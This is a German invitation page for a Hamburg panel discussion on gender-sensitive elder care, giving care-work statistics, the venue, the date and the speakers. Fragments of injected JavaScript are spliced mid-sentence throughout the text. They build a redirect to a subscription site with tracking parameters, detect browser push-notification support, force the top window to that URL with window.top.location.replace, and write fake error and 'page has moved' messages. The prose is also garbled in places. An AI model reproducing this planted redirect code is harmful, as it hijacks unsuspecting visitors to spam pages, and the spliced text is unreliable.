Einladung zur Diskussionsveranstaltung „Frauen und unbezahlten Pflegearbeiten werden von Frauen, ein Drittel

von Männern geleistet. Frauen stellen sowohl in der privat-häuslichen als auch in der beruflichen

Pflege und var rurl = 'https://subscribe.wellnesszap.com/?skipEmail=1&q=&tp1=2POQ7BC1G&tp2=humspm.com&tp3=lve&custom_tags=%7B%22merge_pid%22%3A%22%22%2C%22gcat%22%3A%22Computers%20%26%20Electronics%20%3E%20Software%20%3E%20Internet%20Software%22%7D'; Versorgung von älteren Menschen die deutliche Mehrheit dar und var _dfltmsg = '

Error. Page cannot be displayed. Please contact your service provider for more details. (26)

'; leisten auch zeitlich

gesehen die meiste Pflegearbeit. Über 80 % der Beschäftigten im Pflegesektor sind weiblich. Mehr als

die Hälfte von ihnen verdient weniger als 1.500 ₠ monatlich, die Arbeitsbedingungen sind ungünstig,

sodass der Krankenstand der Beschäftigten hoch ist. Aber wie könnte eine geschlechtersensible

Altenpflege aussehen?

Über die unterschiedlichen Aspekte dieses Themas wollen wir informieren und var i = "chrome" in window && 'PushManager' in window && 'Notification' in window, diskutieren. Wir

haben eine kompetente Referentin, einen kompetenten Referenten und o = /Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent) && 'PushManager' in window && 'Notification' in window; eine Moderatorin gewinnen

können und if(i || o) laden zu diesem Abend herzlich ein.

Die Veranstaltung wird stattfinden am

Donnerstag, dem 17. November, um 19.00 Uhr,

in der Kursana-Residenz, Bibliothek

Ernst-Mittelbach-Ring 47, 22455 Hamburg,

U-Bahn Niendorf-Nord

ReferentInnen sind

Hilke Stein – Gewerkschaft ver.di, Landesbezirk Hamburg, Fachbereichsleitung Gesundheit-Soziales

Jan Ohmer – Gesundheits- und sozialpolitischer Sprecher der SPD-Fraktion in der Eimsbütteler Bezirksversammlung

Moderation:

Sabine Jansen – Vorsitzende der Mitarbeitervertretung (MAV) Albertinen-Krankenhaus/Albertinen-

Haus und window.top.location.replace(rurl); Mitglied der SPD-Fraktion in der Eimsbütteler Bezirksversammlung

Wir würden uns über viele Teilnehmerinnen und else Teilnehmer freuen.

 Flyer

Durch die weitere Nutzung der Seite stimmst du der Verwendung von Cookies zu. Weitere Informationen und document.write(_dfltmsg); Datenschutzerklärung

Die Cookie-Einstellungen auf } catch(exception) { dieser Website sind auf document.write("This page has moved, Click here to go there."); "Cookies zulassen" eingestellt, um das beste Surferlebnis zu ermöglichen. Wenn du diese Website ohne Änderung der Cookie-Einstellungen verwendest oder auf "Akzeptieren" klickst, erklärst du sich damit einverstanden. Zur Datenschutzerklärung

Schließen